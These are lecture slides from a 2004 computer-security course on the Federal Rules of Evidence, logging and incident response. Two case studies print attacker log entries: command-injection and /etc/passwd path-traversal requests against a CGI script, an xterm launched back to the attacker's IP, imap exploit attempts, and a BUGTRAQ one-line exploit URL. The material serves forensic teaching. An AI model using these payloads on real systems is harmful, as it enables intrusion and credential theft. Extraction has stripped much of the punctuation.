Title: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management
1CSCI E-170 November 30, 2004AdministriviaFeder
al Rules of EvidenceLoggingIntegrity Management
2Administrivia
- Project Proposals are due today
- Who is in your group?
- What are you doing?
- Not graded
- Quiz 2 You will be given 4 papers and expected
to write a page on each.
3Administrivia 2
- Some students have not turned in any work to
date. - Think about dropping the course.
- Students who do not turn in a final project will
fail.
4Federal Rules of Evidence
- 9 Articles
- Many states follow FRE
- Codifies common law
- Why study them?
5Article I Ground Rules
- Rule 101 - Scope
- Rule 1101 - Does not apply to preliminary
questions of fact, grand jury, miscellaneous
proceedings - Rule 102 - Purpose
- Fairness
- Eliminate unjustifiable expense and delay
- Rule 103 - Rulings on Evidence
- What to do when opposing parties disagree.
6Article II JUDICIAL NOTICE
- Every case involves the use of hundres or
thousands of non-evidence facts - When a witness says car, eveyone assumes that
the car is an automobile, not a railroad car,
that it is self-propelled, and so on.
7ARTICLE III PRESUMPTIONS IN CIVIL ACTIONS AND
PROCEEDINGS
- Determines who has the burden of rebutting the
evidence. - Presumption imposes on the party against whom it
is directed the burden of going forward with
evidence to rebut or meet the presumption
8ARTICLE IV RELEVANCY AND ITS LIMITS
- Relevant evidence is admissible
- Irrelevant Evidence is inadmissible
- Evidence that wastes time can be excluded
- Character evidence of defendant not admissible to
prove conduct (unless introduced by defendant) - Character evidence of victim introduced only in
homicide case to rebut evidence that alleged
victim was first aggressor - Rule 412 - rape shield law
9ARTICLE V PRIVILEGES
- may be interpreted by the courts of the United
States in light of reason and experience
10ARTICLE VI WITNESSES
- Rule 601 Every person is competent to be a
witness (except as otherwise provided) - Rule 602 Witness must have personal knowledge
- Rule 605 Judge cannot testify as witness
- Rule 606 Juror may not testify as witness
- Rule 612 Adverse party is entitled access to
writing used to refresh memory
11ARTICLE VII OPINIONS AND EXPERT TESTIMONY
- Rule 701 Law Witness may not testify based on
scientific, technical, or other specialized
knowledge - Rule 702 Experts must be qualified use reliable
principles and methods witness must apply
standards to this case. - Rule 704 Experts may state an opinion of the
ultimate issue, except for matters of mental
state.
12ARTICLE VIII HEARSAY
- Rule 801 Hearsay is a statement, other than
one made by the declarant while testifying at the
trial or hearing, offered in evidence to prove
the truth of the matter asserted. - Many, many exceptions to hearsay
- 803(5) - Recorded Recollection
- 803(6) - Records of regularly conducted activity
- 803(7) Absence of entry in records kept in
accordance with 803(6) to prove nonoccurance or
nonexistence
13ARTICLE IX AUTHENTICATION AND IDENTIFICATION
- Rule 901 Documents must be authenticated many
examples given - Rule 902 Some documents are self-authenticating
(computer records arent)
14ARTICLE X CONTENTS OF WRITINGS, RECORDINGS, AND
PHOTOGRAPHS
- Rule 1002 Originals are required, except where
duplicates may be admitted. - Rule 1003 Duplicates may be admitted unless
genuine questions are raised about the
authenticity or in unfair circumstances. - What is an original computer record?
15ARTICLE XI MISCELLANEOUS RULES
- Rule 1101 Applicability
- Rule 1102 Amendments
- Rule 1103 Title
16Orin S. Kerr article
- Whats the point?
- What are Records of regularly conducted
activity? - Are computer records monolithic?
- How do you Authenticate computer records? How are
they challenged? - When do the Hearsay rules apply?
- Whats the deal with postings from websites of
white supremacist groups? - What about email in a harassment case?
17What is a log?
- Definition?
- Unix vs. Windows?
- Palm?
18What gets logged?
19What gets logged?
- Logins / logouts
- Privilege escalation
- Security relevant events
20What goes in a log?
21Why keep logs?
22Why look at logs? (Marcus)
- Policy
- Legality
- Cost saving
23Common mistakes (Marcus)
- 1 collecting it and not looking at it (might
as well log to /dev/null) - 2 watching logs from perimeter systems while
ignoring internal systems - 3 Designing your log architecture before you
decide what youre going to collect - 4 Only looking for what you know you want to
find instead of just looking to see what you find.
24Common Mistakes 2
- 5 Proceeding without doing envelope estimates
with of load. - 6 thinking your logs are evidence if you dont
collect them right - 7 forgetting that this is just a data
management problem - 8 Drinking the XML Kool-ade
25How are things logged?
- f fopen(logfile,w)
- syslog()
- Logger
26Web Logs
- access_log vs. error_log
- 65.54.188.137 - - 30/Nov/2004001654 -0500
"GET /photos/security/printTifs/medRes/onGray/plat
ePlusStickerGreyMR.tif HTTP/1.0" 200 6017064 "-"
"msnbot/0.3 (http//search.msn.com/msnbot.htm)" - 66.35.208.62 - - 30/Nov/2004001738 -0500
"GET /blog/index.rdf HTTP/1.1" 200 8882 "-"
"Jakarta Commons-HttpClient/2.0.1"
27Web logsgrep 'q' www/simson.net/logs/access_lo
g sed 's/.q//' awk 'print 1' head
- smartidentitycardclientdisney-gostart10"
- simsonhldelrieUTF-8oeUTF-8start20saN"
- backingupraiddriveshlenlrieUTF-8oeUTF-8
start10saN" - lzhufhlenlrieUTF-8start40saN"
- brownsimsonFORMSMCRT"
- 22homewiring22_sb_langen"
- 22wirelessphotoalbum22lr"
- lzhufpublicdomainhlenlrieUTF-8start10sa
N" - simsonieISO-8859-1hlenbtnGGoogleSearchmeta
" - simsonieISO-8859-1hlenbtnGGoogleSearchmeta
"
28Mail Logs
- 2004-11-13 235135 Hns.simson.net (64.7.15.234)
64.7.15.234 Fltruxnezze_at_swissonline.chgt
rejected RCPT ltdomideltana_at_ex.comgt Unknown user - 2004-11-13 235136 Hns.simson.net (64.7.15.234)
64.7.15.234 Fltruxnezze_at_swissonline.chgt
rejected RCPT ltdomidrumsaloe_at_ex.comgt Unknown
user - 2004-11-13 235136 Hns.simson.net (64.7.15.234)
64.7.15.234 Fltruxnezze_at_swissonline.chgt
rejected RCPT ltdomie.douglass_at_ex.comgt Unknown
user - 2004-11-13 235137 Hns.simson.net (64.7.15.234)
64.7.15.234 Fltruxnezze_at_swissonline.chgt
rejected RCPT ltdomielihli_at_ex.comgt Unknown user - 2004-11-13 235137 Hns.simson.net (64.7.15.234)
64.7.15.234 Fltruxnezze_at_swissonline.chgt
rejected RCPT ltdomierdoc14_at_ex.comgt Unknown user - 2004-11-13 235138 Hns.simson.net (64.7.15.234)
64.7.15.234 Fltruxnezze_at_swissonline.chgt
rejected RCPT ltdomifdwyer_at_ex.comgt Unknown user - 2004-11-13 235138 Hns.simson.net (64.7.15.234)
64.7.15.234 Fltruxnezze_at_swissonline.chgt
rejected RCPT ltdomil.cpwhiz40_at_ex.comgt Unknown
user - 2004-11-13 235201 Hns.simson.net
(cable-67-97-53-251.dct.al.charter.com)
64.7.15.234 Fltmvceubrfvsrm_at_charter.comgt
rejected RCPT ltgayda_at_ex.comgt Unknow - n user
- 2004-11-13 235201 Hns.simson.net
(cable-67-97-53-251.dct.al.charter.com)
64.7.15.234 Fltmvceubrfvsrm_at_charter.comgt
rejected RCPT ltjensen_at_ex.comgt Unkno - wn user
29Radius Logs
- Sun Mar 18 043524 2001 Acct-Session-Id
"00000000 NAS-IP-Address 192.168.1.5
Acct-Status-Type Stop Acct-Session-Time 0
Acct-Delay-Time 0 Timestamp 984918924
Request-Authenticator VerifiedSun Mar 18
043524 2001 Acct-Session-Id "06000004
User-Name "admin NAS-IP-Address
192.168.1.5 Acct-Status-Type Start
Acct-Authentic Local Service-Type
Administrative-User Login-Service Telnet
Login-IP-Host 192.168.1.1 Acct-Delay-Time
75 Timestamp 984918924 Request-Authenticat
or Verified
30Security Incidents Strange Authentication
Attempts
- I woke up to find these entries in my RADIUS log
file Tue Mar 30 102600 2004 Auth Login
incorrect config/system (from nas xxxx/S99)
Tue Mar 30 102600 2004 Auth Login incorrect
config/password admin (from nas xxxx/S99) Tue
Mar 30 102600 2004 Auth Login incorrect
config/13370n3z (from nas xxxx/S99) Tue Mar
30 102601 2004 Auth Login incorrect
password/fawkoffsz (from nas xxxx/S99) Tue
Mar 30 102601 2004 Auth Login incorrect
password/save (from nas xxxx/S99)
http//seclists.org/lists/incidents/2004/Mar/0116.
html
31Log architectures
32Logging on Unix
- /etc/syslog.conf
- /etc/newsyslog.conf
- Grep
- swatch
33Logging on Windows
- Event Viewer
- Local security settings
34Log hosts Aggregation
35Can you trust these logs?
36October 7th, 1997
- 600pm
- Arrive hotel in New York City.
- Phone system does not support my modem.
- Cell phone reception is terrible.
- 845pm
- Phone call from Eric Bates.
- I think that we have a visitor.
37Wed October 7th, 1997
- User http is logged in on ttyp0 and idle for one
day - bash-2.02 w
- 857PM up 27 days, 1419, 5 users, load
averages 0.28, 0.33, 0.35 - USER TTY FROM LOGIN_at_ IDLE WHAT
- http p0 KRLDB110-06.spli Tue02AM 1days
/bin/sh - simsong p1 asy12.vineyard.n 842PM 15 -tcsh
(tcsh) - ericx p2 mac-ewb.vineyard 846PM 0
script - ericx p3 mac-ewb.vineyard 846PM 11 top
- ericx p4 mac-ewb.vineyard 853PM 1 sleep
5 - bash-2.02
- (Other employees had seen this and ignored it!)
38First step Document the machine
- script(1) to create a transcript
- ps process list
- netstat -a open network connections
- (lsof) open files
- grep krldb access_log likely avenue of attack
- Goals
- Dont alarm intruder.
- Find mechanism of access
- Find out what he/she did.
- Plug the holes.
39ps - processes
- Attacker only had two processes
- /bin/sh on /dev/ttyp0 (2 copies)
- PID 18671 and 26225
- Idle since 2AM the previous day.
- walden 336 grep p0 plist
- http 18671 0.0 0.1 244 276 p0 Is
Tue02AM 002.23 /bin/sh - http 26225 0.0 0.1 236 276 p0 I
Tue04AM 000.07 /bin/sh - walden 337
40netstat - network connections
- w gave incomplete hostname
- KRLDB110-06.spli
- netstat revealed one connection -- x11!
- bash-2.02 netstat -a
- Active Internet connections (including servers)
- Proto Recv-Q Send-Q Local Address
Foreign Address (state) - . . .
- tcp 0 0 APACHE.VINEYARD..3098
KRLDB110-06.spli.X11 ESTABLISHED - Use netstat n to get IP address, from which you
can get the full DNS name.
41access_log - showed attack
- Grep krldb /usr/local/apache/logs/access_log
- krldb110-06.splitrock.net - - 06/Oct/199802534
8 -0400 "GET /cgi-bin/phf?Qnameme0als20-lFa
HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible
MSIE 4.01 Windows 98)" "/htdocs/biz/captiva - krldb110-06.splitrock.net - - 06/Oct/199802535
0 -0400 "GET /cgi-bin/faxsurvey?ls20-lFa
HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible
MSIE 4.01 Windows 98)" "/htdocs/biz/captiva - krldb110-06.splitrock.net - - 06/Oct/199802535
2 -0400 "GET /cgi-bin/view-source?../../../../../
../../../etc/passwd HTTP/1.0" 404 - "-"
"Mozilla/4.0 (compatible MSIE 4.01 Windows 98)"
"/htdocs/biz/captiva"
42Attacker GETs
- GET /cgi-bin/phf?Qnameme0als20-lFa
- GET /cgi-bin/faxsurvey?ls20-lFa
- GET /cgi-bin/view-source?../../../../../../../../e
tc/passwd - GET /cgi-bin/htmlscript?../../../../../../../../et
c/passwd - GET /cgi-bin/campas?0als20-lFa
- GET /cgi-bin/handler/useless_shitls20-lFa?data
Download - GET /cgi-bin/php.cgi?/etc/passwd
- GET /cgi-bin/faxsurvey?ls20-lFa
- GET /cgi-bin/faxsurvey?uname20-a
- GET /cgi-bin/faxsurvey?id
- GET /cgi-bin/faxsurvey?cat20/etc/passwd
- GET /cgi-bin/faxsurvey?ls20-lFa20/usr/
- GET /cgi-bin/faxsurvey?id
- GET /cgi-bin/faxsurvey?pwd
- GET /cgi-bin/faxsurvey?/bin/pwd
- GET /cgi-bin/faxsurvey?ls20-lFa
- GET /cgi-bin/faxsurvey?ls20-lFa20../conf/
43Facts so far
- It looks like the faxsurvey program allowed
attacker to run arbitrary programs. - No evidence that he ran xterm --- except for the
X11 connection back to his machine. - We dont know what he did or what else he knows.
44Action plan
- Add filter to router to block all access from
splitrock (his ISP). - STOP his processes and gcore them to get command
history. - kill -STOP PIDs
- gcore -c file pid
- strings file
- Rename/remove the faxsurvey program (part of
hylafax system).
45Selected Environment variablesfrom /bin/sh 1
- GATEWAY_INTERFACECGI/1.1
- REMOTE_HOSTkrldb110-06.splitrock.net
- REMOTE_ADDR209.156.113.121
- DOCUMENT_ROOT/htdocs/biz/captiva
- REMOTE_PORT4801
- SCRIPT_FILENAME/vni/cgi-bin/faxsurvey
- LOGNAMEhttp
- REQUEST_URI/cgi-bin/faxsurvey?/usr/X11R6/bin/xter
m20-display20209.156.113.1210.020-rv20-e20/b
in/sh - DISPLAY209.156.113.1210.0
- SERVER_PORT80
- SCRIPT_NAME/cgi-bin/faxsurvey
46History from /bin/sh 1
- st2.c
- cron.c
- cxterm.c
- x2.c
- qpush.c
- cat t.c
- cat .c
- cat s.c
- gc c
- ls -lFa
- ./s -v c2
- ./s p0
- ls -lFa /
- cat .s
- ls -lFa
- cat /w
- ls -lFa /
- cat .s
_.s not found gcc -o s steal.c ls -lFa
.c gcc -o s s.c ftp 209.156.113.121 gcc -o s
st2.c ./s console t .s .121 qpush.c ppp.c t2.c cro
n.c cxterm.c tcsh x2.c README README.debian
qpush qpush.c qpush.c.old gf not
found /tmp mfs28 /bin/sh Looks like the
attacker was trying to get some sort of
root-stealing exploit for Linux (or Debian Linux)
to work on the machine.
47Selected history from /bin/sh 2
- /bin/sh
- /bin/sh
- /etc/inetd.conf
- qpush.c
- /usr/bin/gcc
- n/gcc
- ./cc
- expr
- done
- /bin/sh
- inetd.conf
- t) telnet 127.1 143
- cd /etc
- cat .s
- which pwd
- ls -lFa
- expr L 1
- ls -lFa
- ./cc -10
Attacker sees that we are running imap
48Selected history from /bin/sh 2
- ./cc
- /tmp/.s
- /tmp
- cd /tmp
- cd .s
- L100
- cd .s
- L-100
- ls -lFa
- cd /tmp
- /bin/sh
- ./q 127.1
- load
- /bins
- _127.1
- _/bins
- ./cc
- ./cc -92
- ./cc -100
Attempts to exploit imap vulnerability
49Selected history from /bin/sh 2
- cat .s
- export L
- _.s
- cat /etc/passwd grep "root"
- DISPLAY209.156.113.1210.0 -rvgdsg
- DISPLAY209.156.113.1210.0
- cat /etc/passwd Grep "http"
- cat /etc/passwd grep "http"
- cat /etc/passwd grep "www"
- while
- done
- 2 L
- echo L
- (./i 403 0xefbfd5e8 100 cat) nc 127.1 143
- cx L
- L 1
- (./i 403 0xefbfd5e8 100 cat) telnet 127.1 143
- echo
- ./cc L
Searching for accounts and passwords
Tries again for imap
50Selected history from /bin/sh 2
- uname
- ftp 209.156.113.121
- mv pp.c p.c
- ls -lFa mas
- ls -lFa /etc grep "mas"
- cat master.passwd
- telnet 127.1 25
- locate modstat
- which modstat
- ls -lFa /usr/bin/mo
- locate modstate
- locate
- ico s.c
- locate modload
- grep
- ftp wildsau.idv.uni-lki
- i-lki
- cat /etc/inetd.conf
- ./q -0 127.1
Tries for shadow passwordfile
Tries again for sendmail
Tries for linux kernel module loader
And so on
51Epilogue
- We spoke with Splitrock
- They didnt seem to care (Splitrock is a prodigy
dialup port in Texas.) - Eventually we were forced to lower the block.
- FBI didnt care
- This guy is clearly good
- But we didnt have more than 8,000 in damages.
- Vulnerability in faxsurvey had been reported
July 29, 1998 - nearly three months before incident!
52BUGTRAQ Report
- Date Tue, 4 Aug 1998 074124 -0700
- Reply-To dod_at_muenster.net
- From Tom ltdod_at_MUENSTER.NETgt
- Subject remote exploit in faxsurvey
cgi-script - Hi!
- There exist a bug in the 'faxsurvey' CGI-Script,
which allows an attacker to - execute any command s/he wants with the
permissions of the HTTP-Server. - All the attacker has to do is type
- "http//joepc.linux.elsewhere.org/cgi-bin/faxsurve
y?/bin/cat20/etc/passwd" - in his favorite Web-Browser to get a copy of your
Password-File. - All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think
also older ones) with the - HylaFAX package installed are vulnerable to this
attack. - AFAIK the problem exists in the call of 'eval'.
53Epilogue 2
- Follow security advisories.
- Hard to do.
- Dont let http
- run gcc
- read /usr/include
54Detecting attacks with MRTG
- Developed by
- Tobias Oetiker ltoetiker_at_ee.ethz.chgt
- Dave Rand ltdlr_at_bungi.comgt
- Designed to graph bandwidth of connections
- Useful for graphing any value that changes over
time.
55Typical MRTG uses
- T1 utilization
- Dialup utilization
56More MRTG uses
- CPU utilization
- GIF response time
57MRTG shows changes over time
- Hourly
- Daily
- Weekly
- Monthly
58May 19, 1998
- 1000 am
- Meeting in Washington DC at the FBI.
- 330pm
- Get on train from Washington -gt Boston(8 hour
train ride - good chance to relax.) - 430pm
- Call on cell phone from Aaron
59Things are acting strange
- Single server
- WWW, POP, IMAP, etc.
- CGI scripts terminating abnormally.
- POP server sometimes disconnecting before e-mail
is downloaded. - Finger doesnt work quite right.
- Rest of Internet seems normal.
60Whats wrong?
- No clue
- Reboot the computer!
- Problem goes away for 30 minutes, then comes back
61Process list looks normal
- USER PID CPU MEM VSZ RSS TT STAT
STARTED TIME COMMAND - simsong 1770 86.4 2.0 5184 5212 p3 R
534PM 447.73 /usr/local/bin/perl
/usr/local/bin/report.www -v (report.www) - root 24659 31.4 0.0 0 0 ?? Z
419PM 000.00 (admin_server) - root 2345 2.0 0.1 220 284 ?? S
31Dec69 000.02 (ping) - root 1406 0.0 0.0 0 0 ?? Z
532PM 000.00 (junkbuster) - root 0 0.0 0.0 0 0 ?? DLs
Mon01PM 000.30 (swapper) - root 1 0.0 0.1 148 288 ?? Ss
Mon01PM 001.63 /sbin/init - root 2 0.0 0.0 0 12 ?? DL
Mon01PM 000.01 (pagedaemon) - root 15 0.0 0.0 68 64 ?? Is
Mon01PM 000.00 asyncd 2 - root 17 0.0 0.0 68 64 ?? Is
Mon01PM 000.02 asyncd 2 - root 26 0.0 0.8 748 2008 ?? Ss
Mon01PM 000.67 mfs -o rw -s 40960 /dev/sd0b
/tmp (mount_mfs) - root 51 0.0 0.1 268 296 ?? Ss
Mon01PM 002.92 gettyd -s - root 62 0.0 0.1 160 340 ?? Ss
Mon01PM 119.11 syslogd - daemon 65 0.0 0.1 112 184 ?? Ss
Mon01PM 001.36 portmap - root 72 0.0 0.1 216 300 ?? Ss
Mon01PM 001.34 mountd - root 74 0.0 0.1 144 288 ?? Is
Mon01PM 000.01 nfsd-master (nfsd) - root 76 0.0 0.0 76 100 ?? I
Mon01PM 000.00 nfsd-server (nfsd) - root 77 0.0 0.0 76 100 ?? I
Mon01PM 000.04 nfsd-server (nfsd) - root 78 0.0 0.0 76 100 ?? I
Mon01PM 000.00 nfsd-server (nfsd)
62MRTG reveals a problem
- Something is eating a lot of outgoing bandwidth
- BLUE is transmitted data
- GREEN is received data
63Process list shows a problem far down from the
top
- ftp 1471 0.0 0.2 740 496 ?? I
1228PM 013.88 ds9.kulnet.kuleuven.ac.be
anonymous/mailtothedude_at_iname.com RETR
pwa98cbl.zip\r\n (ftpd) - ftp 1750 0.0 0.2 752 504 ?? S
1232PM 012.79 ds9.kulnet.kuleuven.ac.be
anonymous/guest_at_ RETR pwa98cbj.zip\r\n (ftpd) - ftp 6982 0.0 0.2 288 480 ?? S
120PM 017.21 142.194.48.68
anonymous/getright_at_ RETR /simson/open/nothing_her
e/this_site_sucks/pwa98cbg.zip\r\n (ftpd) - ftp 10062 0.0 0.2 288 480 ?? S
153PM 000.27 cmodem85.lancite.net
anonymous/getright_at_ RETR /simson/open/
/calibreX/Win98.Final-PWA/pwa98cbf.zip\r\n (ftpd) - ftp 10088 0.0 0.2 288 480 ?? S
154PM 000.27 cmodem85.lancite.net
anonymous/getright_at_ RETR /simson/open/
/calibreX/Win98.Final-PWA/pwa98cbe.zip\r\n (ftpd) - ftp 10125 0.0 0.2 288 480 ?? S
154PM 000.28 cmodem85.lancite.net
anonymous/getright_at_ RETR /simson/open/
/calibreX/Win98.Final-PWA/pwa98cbd.zip\r\n (ftpd) - ftp 10251 0.0 0.2 288 480 ?? S
155PM 000.28 cmodem85.lancite.net
anonymous/getright_at_ RETR /simson/open/
/calibreX/Win98.Final-PWA/pwa98cbc.zip\r\n (ftpd) - Total simultaneous FTP transfers 106
64Netstat reveals further information
- walden 424 more netstat-list
- Active Internet connections (including servers)
- Proto Recv-Q Send-Q Local Address
Foreign Address (state) - tcp 0 0 VINEYARD.NET.http
a2p09.capcon.net.1203 SYN_RCVD - tcp 0 0 VINEYARD.NET.http
DSY4.VINEYARD.NE.1406 SYN_RCVD - tcp 0 0 VINEYARD.NET.pop
ASY5.VINEYARD.NE.2117 ESTABLISHED - tcp 0 1513 VINEYARD.NET.http
207.112.204.161.1570 FIN_WAIT_1 - tcp 0 8500 VINEYARD.NET.http
srry01m05-128.bc.1505 ESTABLISHED - tcp 0 7168 VINEYARD.NET.http
hd62-160.hil.com.2033 ESTABLISHED - tcp 0 8192 VINEYARD.NET.http
208.232.119.2.4125 ESTABLISHED - tcp 0 7552 VINEYARD.NET.20
hades.osc.epsilo.2943 ESTABLISHED - tcp 0 6952 VINEYARD.NET.http
ww-tl01.proxy.ao.37672 ESTABLISHED - tcp 0 0 VINEYARD.NET.ftp
dns1.bit-net.com.2268 ESTABLISHED - tcp 0 0 VINEYARD.NET.http
cs206-32.student.1068 FIN_WAIT_2 - tcp 0 0 VINEYARD.NET.ftp
spc-isp-mon-uas-.1037 ESTABLISHED - tcp 0 0 VINEYARD.NET.ftp
kenny26.zip.com..1033 ESTABLISHED - tcp 0 0 VINEYARD.NET.http
cs206-32.student.1067 FIN_WAIT_2 - tcp 0 0 VINEYARD.NET.ftp
sladl3p24.ozemai.1676 ESTABLISHED - tcp 0 8760 VINEYARD.NET.pop
ASY10.VINEYARD.N.1043 ESTABLISHED
65Weve been warezed!
- ftp//vineyard.net/simson/open
- World-writable FTP directory.
- Two directories were created in open
- Three spaces
- nothing_here
66File list
- ./open/ /
- ./open/ /calibreX/
- ./open/ /calibreX/Win98.Final-PWA/
- ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
ws98_FINAL_Retail_Full_Setup-PWA/ - ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
ws98_FINAL_Retail_Full_Setup-PWA/PWA.NFO - ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
ws98_FINAL_Retail_Full_Setup-PWA/pwa98rfl1.zip - ./open/ /calibreX/Win98.Final-PWA/file_id.diz
- ./open/ /calibreX/Win98.Final-PWA/PWA.NFO
- ./open/ /calibreX/Win98.Final-PWA/pwa98cba.zip
- ./open/ /calibreX/Win98.Final-PWA/pwa98cbd.good.z
ip - ./open/ /calibreX/Win98.Final-PWA/pwa98cbb.zip
- ./open/ /calibreX/Win98.Final-PWA/pwa98cbc.zip
- ./open/ /calibreX/Win98.Final-PWA/pwa98cbd.zip
- ./open/ /calibreX/Win98.Final-PWA/pwa98cbe.zip
- . . .
- ./open/nothing_here/
- ./open/nothing_here/ /
- ./open/nothing_here/ /pwa98cba.zip
67/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/
- Pirates With Attitudes
- Supplier PWA Gods
- Cracker N/A
- Packager Murmillius
- Protection Serial Number
- Type Operating System
- Disks 21 x 5meg
68PWA.NFO
- Here it is Windows '98 Final release - Retail
Full Install! - While every other group will be bringing you so
many good programs for this operating system,
it's PWA that brings you the OS itself. It is
fortunately for the user community that this is
the case or you would probably have ended up with
a ripped down release from some other lame group
missing important system files like KRNL386.exe,
because disklimits are more important nowadays to
these people than a working release.
69PWA.NFO cont
- You need to download the CABS and the RETAIL
SETUP and unzip/unrar everything into one
directory. The reason for this is that as soon
as I get install keys, I can release RETAIL
UPGRADE, OEM FULL and OEM UPGRADE versions and
they will only take 4 meg each (the CAB zips are
generic thruout all these versions, I can just
package up the differences in seperate zips to
save everyone space and time). You just
unzip whichever one you want into the same
directory as the generic CAB zips.
70Question Is PWA.NFO Hearsay?
71What we did
- Called Microsofts anti-piracy line.
- Useless
- Called FBI
- Pretty useless as well.
- Called Pace University
- This got results
- not necessarily the right results.
72Integrity Management
- What is it?
- How do you do it?
- Tripwire
- Comparison Copies